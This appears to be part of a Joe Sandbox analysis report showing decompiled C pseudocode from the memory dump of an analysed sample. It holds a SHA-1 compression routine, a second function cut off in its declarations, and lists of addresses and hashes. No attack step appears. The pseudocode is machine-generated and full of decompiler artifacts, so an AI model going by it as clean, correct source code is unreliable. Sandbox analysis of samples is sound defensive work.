                                                    0x00000000
                                                    0x00cd7967
                                                    0x00cd7968
                                                    0x00cd796b
                                                    0x00cd796e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7970
                                                    0x00000000
                                                    0x00cd7970
                                                    0x00cd7976
                                                    0x00cd7978
                                                    0x00000000
                                                    0x00cd7978
                                                    0x00cd7922
                                                    0x00cd7925
                                                    0x00cd7927
                                                    0x00cd7931
                                                    0x00cd7939
                                                    0x00cd793b
                                                    0x00cd793e
                                                    0x00cd7940
                                                    0x00cd7943
                                                    0x00cd794b
                                                    0x00000000
                                                    0x00cd794b
                                                    0x00cd78d0
                                                    0x00cd78d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd78d6
                                                    0x00cd78e1
                                                    0x00cd78e7
                                                    0x00cd783c
                                                    0x00000000
                                                    0x00cd783c
                                                    0x00cd78ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd78f5
                                                    0x00cd78fb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd78fb
                                                    0x00cd7874
                                                    0x00cd7835
                                                    0x00cd7835
                                                    0x00000000
                                                    0x00cd7835
                                                    0x00cd7813
                                                    0x00cd7817
                                                    0x00cd7818
                                                    0x00cd7819
                                                    0x00cd7821
                                                    0x00000000
                                                    0x00cd7823
                                                    0x00000000
                                                    0x00cd7823

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                    • Instruction ID: fef54d40e2703033dbe253ce4a96c79322c9da7c8e16fbe0704a9a3936c1a69f
                                                    • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                    • Instruction Fuzzy Hash: FE62E97160C3458FCB15CF28C8909B9BBE1BFD5304F18866EE99A8B346E730E945DB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCF461 Relevance: .7, Instructions: 694COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E00CCF461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t434;
				intOrPtr _t436;
				intOrPtr _t441;
				void* _t446;
				intOrPtr _t448;
				signed int _t451;
				void* _t453;
				signed int _t459;
				signed int _t465;
				signed int _t471;
				signed int _t478;
				signed int _t481;
				signed int _t488;
				signed int _t511;
				signed int _t518;
				signed int _t525;
				signed int _t545;
				signed int _t554;
				signed int _t563;
				signed int* _t591;
				signed int _t592;
				signed int _t596;
				signed int _t599;
				signed int _t600;
				signed int* _t601;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				signed int _t607;
				signed int* _t608;
				signed int _t609;
				signed int* _t675;
				signed int* _t746;
				signed int _t757;
				signed int _t774;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t787;
				signed int _t788;
				signed int _t792;
				signed int _t797;
				signed int _t801;
				signed int _t805;
				signed int _t807;
				signed int _t810;
				signed int* _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t821;
				signed int _t822;
				signed int _t826;
				signed int _t831;
				signed int _t835;
				signed int _t839;
				signed int* _t840;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t846;
				signed int _t847;
				signed int _t849;
				signed int* _t850;
				signed int _t853;
				signed int _t857;
				signed int _t858;
				signed int* _t862;
				signed int _t863;
				signed int _t865;
				signed int _t866;
				signed int _t870;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t887;
				signed int _t888;
				signed int* _t889;
				signed int _t890;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int _t899;
				signed int _t900;
				signed int _t902;
				signed int _t903;
				signed int* _t904;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				signed int _t910;
				signed int _t911;

				_t912 =  &_v40;
				if(_a16 == 0) {
					_t840 = _a8;
					_v20 = _t840;
					E00CE0320(_t840, _a12, 0x40);
					_t912 =  &(( &_v40)[3]);
				} else {
					_t840 = _a12;
					_v20 = _t840;
				}
				_t850 = _a4;
				_t592 = _t850[1];
				_t894 =  *_t850;
				_v28 = _t850[2];
				_v24 = _t850[3];
				_v32 = _t592;
				_v36 = 0;
				_t434 = E00CE68E4( *_t840);
				asm("rol edx, 0x5");
				 *_t840 = _t434;
				_t435 = _t840;
				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
				_v16 = _t840;
				_t853 = _v32;
				asm("ror esi, 0x2");
				_v32 =  &(_t840[3]);
				do {
					_t436 = E00CE68E4(_t435[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t436;
					asm("ror ebp, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
					_t441 = E00CE68E4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t441;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
					_t446 = E00CE68E4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t446;
					asm("ror dword [esp+0x2c], 0x2");
					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
					_t448 = E00CE68E4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t448;
					_t451 = _v36 + 5;
					asm("ror dword [esp+0x2c], 0x2");
					_v36 = _t451;
					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
					_v16 =  &(_t840[_t451]);
					_t453 = E00CE68E4(_t840[_t451]);
					_t912 =  &(_t912[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t453;
					_t435 = _v16;
					asm("ror esi, 0x2");
					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
				} while (_v36 != 0xf);
				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
				_v32 = _t853;
				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
				asm("rol ecx, 0x5");
				asm("rol esi, 1");
				asm("rol edx, 1");
				asm("ror ebp, 0x2");
				_t840[1] = _t774;
				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
				 *_t840 = _t857;
				_v40 = _t459;
				asm("rol ecx, 0x5");
				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
				_v36 = _t465;
				asm("ror ebx, 0x2");
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror dword [esp+0x10], 0x2");
				_t840[2] = _t778;
				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
				_v32 = _t471;
				asm("rol ecx, 0x5");
				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
				_t858 = _v40;
				asm("rol edx, 1");
				_t840[3] = _t782;
				_v24 = _t596;
				asm("ror dword [esp+0x18], 0x2");
				_t783 = 0x11;
				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
				_v16 = _t783;
				do {
					_t96 = _t783 + 5; // 0x16
					_t478 = _t96;
					_t97 = _t783 - 5; // 0xc
					_v8 = _t478;
					_t99 = _t783 + 3; // 0x14
					_t896 = _t99 & 0x0000000f;
					_v12 = _t896;
					_t599 = _t478 & 0x0000000f;
					asm("rol ecx, 0x5");
					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
					_t481 = _v16;
					asm("rol edx, 1");
					_t840[_t896] = _t787;
					_t897 = _v32;
					asm("ror ebp, 0x2");
					_v32 = _t897;
					_t862 = _v20;
					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
					_t788 = 0xf;
					_t899 = _t481 + 0x00000004 & _t788;
					_t842 = _t481 + 0x00000006 & _t788;
					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
					asm("rol edx, 1");
					 *(_t862 + _t899 * 4) = _t792;
					_t863 = _v28;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v28 = _t863;
					_t488 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
					_t865 = _t488 + 0x00000007 & 0x0000000f;
					_t675 = _v20;
					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
					asm("rol edx, 1");
					 *(_t675 + _t599 * 4) = _t797;
					_t600 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t600;
					_t601 = _v20;
					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
					asm("rol ecx, 0x5");
					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t601 + _t842 * 4) = _t801;
					_t602 = _v24;
					_t843 = _v40;
					asm("ror edi, 0x2");
					_v40 = _t843;
					_t840 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
					_t900 = _v36;
					asm("rol edx, 1");
					asm("rol ecx, 0x5");
					_t840[_t865] = _t805;
					_t858 = _v40;
					_t783 = _v8;
					asm("ror ebp, 0x2");
					_v36 = _t900;
					_v16 = _t783;
					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
				} while (_t783 + 3 <= 0x23);
				_t866 = 0x25;
				_v16 = _t866;
				while(1) {
					_t205 = _t866 + 5; // 0x2a
					_t511 = _t205;
					_t206 = _t866 - 5; // 0x20
					_v4 = _t511;
					_t208 = _t866 + 3; // 0x28
					_t807 = _t208 & 0x0000000f;
					_v8 = _t807;
					_t902 = _t511 & 0x0000000f;
					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
					asm("rol esi, 1");
					_t840[_t807] = _t870;
					asm("ror dword [esp+0x1c], 0x2");
					asm("rol edx, 0x5");
					_t871 = 0xf;
					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
					_t518 = _v16;
					_t604 = _t518 + 0x00000006 & _t871;
					_t810 = _t518 + 0x00000004 & _t871;
					_v12 = _t810;
					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
					asm("rol esi, 1");
					_t840[_t810] = _t875;
					_t844 = _v28;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v28 = _t844;
					_t812 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
					_t525 = _v16;
					_t846 = _t525 + 0x00000007 & 0x0000000f;
					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
					asm("rol esi, 1");
					 *(_t812 + _t902 * 4) = _t879;
					asm("rol edx, 0x5");
					_t903 = _v24;
					asm("ror ebp, 0x2");
					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
					_v24 = _t903;
					_t904 = _v20;
					_v36 = _t815;
					asm("rol edx, 0x5");
					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t604 * 4) = _t883;
					_t602 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
					_v32 = _t816;
					asm("rol edx, 0x5");
					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t846 * 4) = _t887;
					_t905 = _v36;
					asm("ror ebp, 0x2");
					_v36 = _t905;
					_t309 = _t816 - 0x70e44324; // -4294967294
					_t866 = _v4;
					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
					_v16 = _t866;
					if(_t866 + 3 > 0x37) {
						break;
					}
					_t840 = _v20;
				}
				_t817 = 0x39;
				_v16 = _t817;
				_t847 = _t602;
				do {
					_t315 = _t817 + 5; // 0x3e
					_t545 = _t315;
					_v8 = _t545;
					_t317 = _t817 + 3; // 0x3c
					_t318 = _t817 - 5; // 0x34
					_t888 = 0xf;
					_t907 = _t317 & _t888;
					_t606 = _t545 & _t888;
					_t889 = _v20;
					_v4 = _t907;
					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t907 * 4) = _t821;
					_t908 = _v32;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v32 = _t908;
					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
					_t554 = _v16;
					_t822 = 0xf;
					_t849 = _t554 + 0x00000006 & _t822;
					_t910 = _t554 + 0x00000004 & _t822;
					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t910 * 4) = _t826;
					_t890 = _v28;
					asm("rol ecx, 0x5");
					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
					_t563 = _v16;
					asm("ror esi, 0x2");
					_v28 = _t890;
					_t892 = _t563 + 0x00000007 & 0x0000000f;
					_t746 = _v20;
					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t746 + _t606 * 4) = _t831;
					_t607 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t607;
					_t608 = _v20;
					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
					asm("rol edx, 1");
					_t608[_t849] = _t835;
					_t847 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
					_t911 = _v36;
					asm("rol edx, 1");
					_t608[_t892] = _t839;
					_t609 = _v40;
					_t893 = _v32;
					asm("ror ebp, 0x2");
					_t817 = _v8;
					asm("rol ecx, 0x5");
					_v36 = _t911;
					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
					_v16 = _t817;
					_v28 = _t757;
				} while (_t817 + 3 <= 0x4b);
				_t591 = _a4;
				_t591[1] = _t591[1] + _t893;
				_t591[2] = _t591[2] + _t911;
				_t591[3] = _t591[3] + _t609;
				 *_t591 =  *_t591 + _t757;
				_t591[4] = _t591[4] + _t847;
				return _t591;
			}












































































































                                                    0x00ccf461
                                                    0x00ccf46d
                                                    0x00ccf479
                                                    0x00ccf483
                                                    0x00ccf488
                                                    0x00ccf48d
                                                    0x00ccf46f
                                                    0x00ccf46f
                                                    0x00ccf473
                                                    0x00ccf473
                                                    0x00ccf490
                                                    0x00ccf499
                                                    0x00ccf49c
                                                    0x00ccf49e
                                                    0x00ccf4a8
                                                    0x00ccf4ae
                                                    0x00ccf4b2
                                                    0x00ccf4b6
                                                    0x00ccf4ce
                                                    0x00ccf4da
                                                    0x00ccf4de
                                                    0x00ccf4e0
                                                    0x00ccf4e2
                                                    0x00ccf4e6
                                                    0x00ccf4ea
                                                    0x00ccf4ed
                                                    0x00ccf4f1
                                                    0x00ccf4f4
                                                    0x00ccf4ff
                                                    0x00ccf504
                                                    0x00ccf51e
                                                    0x00ccf523
                                                    0x00ccf52e
                                                    0x00ccf53b
                                                    0x00ccf540
                                                    0x00ccf554
                                                    0x00ccf55b
                                                    0x00ccf565
                                                    0x00ccf572
                                                    0x00ccf57b
                                                    0x00ccf58b
                                                    0x00ccf597
                                                    0x00ccf599
                                                    0x00ccf5a4
                                                    0x00ccf5a9
                                                    0x00ccf5ac
                                                    0x00ccf5c0
                                                    0x00ccf5c7
                                                    0x00ccf5ce
                                                    0x00ccf5d7
                                                    0x00ccf5db
                                                    0x00ccf5df
                                                    0x00ccf5ea
                                                    0x00ccf5ed
                                                    0x00ccf5f0
                                                    0x00ccf5fc
                                                    0x00ccf60e
                                                    0x00ccf611
                                                    0x00ccf613
                                                    0x00ccf62d
                                                    0x00ccf630
                                                    0x00ccf646
                                                    0x00ccf649
                                                    0x00ccf64c
                                                    0x00ccf650
                                                    0x00ccf654
                                                    0x00ccf661
                                                    0x00ccf664
                                                    0x00ccf666
                                                    0x00ccf668
                                                    0x00ccf674
                                                    0x00ccf694
                                                    0x00ccf697
                                                    0x00ccf699
                                                    0x00ccf69f
                                                    0x00ccf6a2
                                                    0x00ccf6a8
                                                    0x00ccf6b1
                                                    0x00ccf6ba
                                                    0x00ccf6cd
                                                    0x00ccf6d1
                                                    0x00ccf6d7
                                                    0x00ccf6da
                                                    0x00ccf6df
                                                    0x00ccf6eb
                                                    0x00ccf6f5
                                                    0x00ccf6fa
                                                    0x00ccf702
                                                    0x00ccf707
                                                    0x00ccf708
                                                    0x00ccf70c
                                                    0x00ccf710
                                                    0x00ccf714
                                                    0x00ccf714
                                                    0x00ccf717
                                                    0x00ccf71a
                                                    0x00ccf721
                                                    0x00ccf726
                                                    0x00ccf72b
                                                    0x00ccf732
                                                    0x00ccf73c
                                                    0x00ccf745
                                                    0x00ccf748
                                                    0x00ccf74c
                                                    0x00ccf750
                                                    0x00ccf753
                                                    0x00ccf75b
                                                    0x00ccf76b
                                                    0x00ccf774
                                                    0x00ccf778
                                                    0x00ccf781
                                                    0x00ccf784
                                                    0x00ccf786
                                                    0x00ccf798
                                                    0x00ccf7a3
                                                    0x00ccf7a5
                                                    0x00ccf7a8
                                                    0x00ccf7ae
                                                    0x00ccf7b3
                                                    0x00ccf7c6
                                                    0x00ccf7cc
                                                    0x00ccf7d0
                                                    0x00ccf7e0
                                                    0x00ccf7e9
                                                    0x00ccf7f3
                                                    0x00ccf7f6
                                                    0x00ccf7f8
                                                    0x00ccf7ff
                                                    0x00ccf805
                                                    0x00ccf814
                                                    0x00ccf821
                                                    0x00ccf827
                                                    0x00ccf82f
                                                    0x00ccf850
                                                    0x00ccf853
                                                    0x00ccf856
                                                    0x00ccf85a
                                                    0x00ccf85d
                                                    0x00ccf863
                                                    0x00ccf86f
                                                    0x00ccf87c
                                                    0x00ccf880
                                                    0x00ccf88a
                                                    0x00ccf8a3
                                                    0x00ccf8aa
                                                    0x00ccf8ae
                                                    0x00ccf8b0
                                                    0x00ccf8b3
                                                    0x00ccf8b8
                                                    0x00ccf8be
                                                    0x00ccf8c6
                                                    0x00ccf8d3
                                                    0x00ccf8d9
                                                    0x00ccf8e0
                                                    0x00ccf8e4
                                                    0x00ccf8ef
                                                    0x00ccf8f0
                                                    0x00ccf8fa
                                                    0x00ccf8fa
                                                    0x00ccf8fa
                                                    0x00ccf8fd
                                                    0x00ccf900
                                                    0x00ccf907
                                                    0x00ccf90c
                                                    0x00ccf911
                                                    0x00ccf918
                                                    0x00ccf926
                                                    0x00ccf93d
                                                    0x00ccf93f
                                                    0x00ccf94a
                                                    0x00ccf94f
                                                    0x00ccf952
                                                    0x00ccf95b
                                                    0x00ccf95f
                                                    0x00ccf966
                                                    0x00ccf96b
                                                    0x00ccf972
                                                    0x00ccf982
                                                    0x00ccf98b
                                                    0x00ccf98d
                                                    0x00ccf990
                                                    0x00ccf9a4
                                                    0x00ccf9ab
                                                    0x00ccf9ae
                                                    0x00ccf9b8
                                                    0x00ccf9be
                                                    0x00ccf9c2
                                                    0x00ccf9d2
                                                    0x00ccf9e1
                                                    0x00ccf9e4
                                                    0x00ccf9e6
                                                    0x00ccf9ed
                                                    0x00ccf9f0
                                                    0x00ccfa0c
                                                    0x00ccfa19
                                                    0x00ccfa1b
                                                    0x00ccfa1f
                                                    0x00ccfa26
                                                    0x00ccfa2d
                                                    0x00ccfa46
                                                    0x00ccfa4a
                                                    0x00ccfa4c
                                                    0x00ccfa50
                                                    0x00ccfa64
                                                    0x00ccfa7b
                                                    0x00ccfa80
                                                    0x00ccfa87
                                                    0x00ccfa9e
                                                    0x00ccfaa8
                                                    0x00ccfaaa
                                                    0x00ccfaae
                                                    0x00ccfaba
                                                    0x00ccfabf
                                                    0x00ccfac7
                                                    0x00ccfacd
                                                    0x00ccfad3
                                                    0x00ccfad7
                                                    0x00ccfae1
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccf8f6
                                                    0x00ccf8f6
                                                    0x00ccfae9
                                                    0x00ccfaea
                                                    0x00ccfaee
                                                    0x00ccfaf0
                                                    0x00ccfaf0
                                                    0x00ccfaf0
                                                    0x00ccfaf5
                                                    0x00ccfaf9
                                                    0x00ccfafe
                                                    0x00ccfb03
                                                    0x00ccfb08
                                                    0x00ccfb0a
                                                    0x00ccfb0c
                                                    0x00ccfb10
                                                    0x00ccfb1f
                                                    0x00ccfb2e
                                                    0x00ccfb30
                                                    0x00ccfb33
                                                    0x00ccfb3b
                                                    0x00ccfb40
                                                    0x00ccfb49
                                                    0x00ccfb4f
                                                    0x00ccfb53
                                                    0x00ccfb57
                                                    0x00ccfb5e
                                                    0x00ccfb60
                                                    0x00ccfb73
                                                    0x00ccfb82
                                                    0x00ccfb84
                                                    0x00ccfb87
                                                    0x00ccfb8f
                                                    0x00ccfba2
                                                    0x00ccfba6
                                                    0x00ccfbaa
                                                    0x00ccfbad
                                                    0x00ccfbbd
                                                    0x00ccfbc6
                                                    0x00ccfbd0
                                                    0x00ccfbd3
                                                    0x00ccfbd5
                                                    0x00ccfbdc
                                                    0x00ccfbe0
                                                    0x00ccfbf5
                                                    0x00ccfbfe
                                                    0x00ccfc02
                                                    0x00ccfc06
                                                    0x00ccfc28
                                                    0x00ccfc34
                                                    0x00ccfc37
                                                    0x00ccfc39
                                                    0x00ccfc3c
                                                    0x00ccfc4a
                                                    0x00ccfc57
                                                    0x00ccfc74
                                                    0x00ccfc77
                                                    0x00ccfc7b
                                                    0x00ccfc7d
                                                    0x00ccfc80
                                                    0x00ccfc86
                                                    0x00ccfc8e
                                                    0x00ccfc97
                                                    0x00ccfc9b
                                                    0x00ccfca4
                                                    0x00ccfca8
                                                    0x00ccfcaa
                                                    0x00ccfcb1
                                                    0x00ccfcb5
                                                    0x00ccfcbe
                                                    0x00ccfcc2
                                                    0x00ccfcc5
                                                    0x00ccfcc8
                                                    0x00ccfccb
                                                    0x00ccfccd
                                                    0x00ccfcd7

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                    • Instruction ID: 1d44ef139e8366c4eb9a77c592fcb3a50a9ddd27c72590be74b13c9e2213ba5a
                                                    • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                    • Instruction Fuzzy Hash: 9F524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD7153 Relevance: .5, Instructions: 536COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CD7153(signed int __ecx) {
				void* __ebp;
				void* _t220;
				signed int* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t233;
				signed int _t234;
				signed short _t235;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				unsigned int _t250;
				signed int _t260;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed short _t276;
				signed int _t277;
				signed int _t281;
				signed int _t282;
				unsigned int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed short _t293;
				unsigned int _t298;
				signed int _t303;
				unsigned int _t305;
				signed int _t310;
				signed short _t311;
				signed int _t316;
				intOrPtr* _t321;
				signed int* _t322;
				unsigned int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				void* _t349;
				signed int _t352;
				signed int _t353;
				unsigned int _t356;
				signed int _t357;
				void* _t358;
				signed int _t361;
				signed int _t362;
				void* _t365;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t371;
				void* _t372;
				signed int* _t376;
				signed int _t379;
				unsigned int _t382;
				signed int _t383;
				void* _t384;
				signed int _t387;
				void* _t390;
				unsigned int _t393;
				signed int _t394;
				unsigned int _t397;
				void* _t399;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				void* _t411;
				signed int _t415;
				signed int _t416;
				intOrPtr* _t418;
				void* _t419;
				void* _t422;
				signed int _t425;
				intOrPtr* _t429;
				void* _t430;
				signed int* _t436;
				unsigned int _t438;
				unsigned int _t442;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				unsigned int _t451;
				unsigned int _t455;
